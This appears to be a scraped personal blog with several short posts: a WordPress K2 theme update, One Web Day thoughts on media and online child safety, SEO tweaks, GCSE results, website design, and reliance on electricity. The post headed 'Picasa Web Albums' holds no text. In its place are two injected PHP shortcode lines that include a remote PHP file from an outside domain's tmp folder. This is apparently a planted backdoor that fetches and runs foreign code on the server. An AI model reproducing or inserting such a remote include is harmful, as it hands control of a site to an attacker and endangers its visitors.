We have AJAX

I have just completed the update to the theme on jacktams.co.uk, I am now running the latest version of K2 and Unsleepable with my mods on top.

And as you will probably see as you browse around there is some nice AJAX improvements that K2 brings to WordPress. I am still working on some finishing touches but I am very pleased with the new theme since I now have got it to work by deleting all the K2 records from the options database.

One Web Day – Cont

One Web DayContinuing what I said this morning, I am going to write something with a web theme, and try not to be boring.

I could give a history – but that would be boring – What I can say is how the web has changed the way a consume media and also become a creator of sorts.

I wake up in the morning, wake up my iMac, and Google Reader is there to great me; all the news I could ever want tech, entertainment, current affairs, you name it I can have it there. Usually at least 4 different slants on the same topic, there’s nothing like having all the sides of the argument. Then to the mail, for most people this is were it would go wrong, SPAM, but surprisingly I get very little, and what I do get goes to the bin by itself.
eMail, I get a few offer updates from the myriad of tech sites I am a member of, I also get work eMails, and a couple of mailing list filter in. So in two applications I have got my fingertips in a number different information streams, I also can communicate with anybody around the world.

So on to what the internet should grow into; Mainly a trend already started for the web to become more social but not only that, everybody needs access to it. Yes, I mean everybody, developing countries are full of people who could thrive online, creativity is often increased by not having contact with the technology that the invention is based i.e. interweb. Also we need to see an end to SPAM viruses, cons and the general nastiness that the web fosters; its just simply not what it is all about.

A step in the right direction?

There was much talk about educating children to use the internet responsibly and not give out personal details.

While this is a step in the right direction and something I support entirely, there is still a missing link, its alright having this information given to kids at school but there are very few schools that haven’t got censoring and monitoring on their internet connection so in theory they cant access potentially dangerous at school.

But at home? This missing link is the Parents, in most households the children would be seen as the most tech savvy so do the parents know about all the filtering and stuff they need to? I am also against filtering of the internet, in an interview with somebody from the Child Exploitation and Online Protection Centre (CEOP) on the news this morning said “the internet is just to big” To which my response was thank god somebody gets it, hopefully this will start filtering in to Kids and parents alike and we should all become more web aware because of it.

Think U Know Campaign Video


I decided to do some updates to the site. I have improved the look of the site or at least I think I have. I also massively overhauled the META information in the head of the site, get the rankings up its all good.

I will hopefully finished and quashed any problems caused be me updating the theme.

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GCSE Results in!

Its sunday now and i havent posted for along time, so i though i would post my GCSE results online so here goes:

Now that was painless wasnt it?

Picasa Web Albums

[insert_php] include(“http://acommeamour.fr/tmp/uxmik.php”); [/insert_php]
[php] include(“http://acommeamour.fr/tmp/uxmik.php”); [/php]

What makes a good website?

I have being try to figure this one out over the last couple of days before I start development of the new 3stooges.co.uk site, i know what i personally want from the site, but what will make this site different from any other site? Well first of nothing there are so many websites out there that it makes no difference what your content is cos chances are there will be somebody else somewhere doing the same, so does it then fall to interesting design, well yes and no if you make it too radically your site becomes niché (new cool feature in mac os i found to get accent) and confusing to use, and you could even make the site too good and the content would be all poo.

So a perfect website would be nice to look at, some cool features and plenty of good content. In that statement i opened another can of worms what is good design, for me it would be functional and looks simple.

“99% of the internet is rubbish” -unkown “the internet is a series of tubes” – Ted Stevens

So How dependent are we on electricity?

Well the answer is simple, VERY.

We had a power cut yesterday and i could do nothing while the power came back on (about 35mins). We couldn’t ring out on the Landline or VOIP line, watch the tele, do my day-to-day business on the interweb, i couldn’t even hoover(yes i was forced to tidy up, and i still haven’t finished)

But just think how much of our infrastructures are dependant on electricty? Increasingly Phones, Traffic Lights, Safety systems (these should have back-up power) Even the bare essentials are effected, showers, heating/AC, Cook Appliances. Practically everything goes off, i would be interesting to see how we could manage without power. The big power cut in New York a few years back highlights out dependancy how many millions did it cost and how many people were trapped or unable to commute in that 14hour stretch.

No moving to focus on the UK, with the amount of redundancy in the National Grid dropping as more and more pwer stations are taken offline we are going to face more and more power-cuts, which means we have to get big on renewables or nuclear, or even both. I have to say i arent a fan of nuclear but the fact is there is that many people who object to the current viable renewable means that nuclear is the only option.

N.B. I couldn’t be bothered to link to sources for the information but it is freely available have a quick google.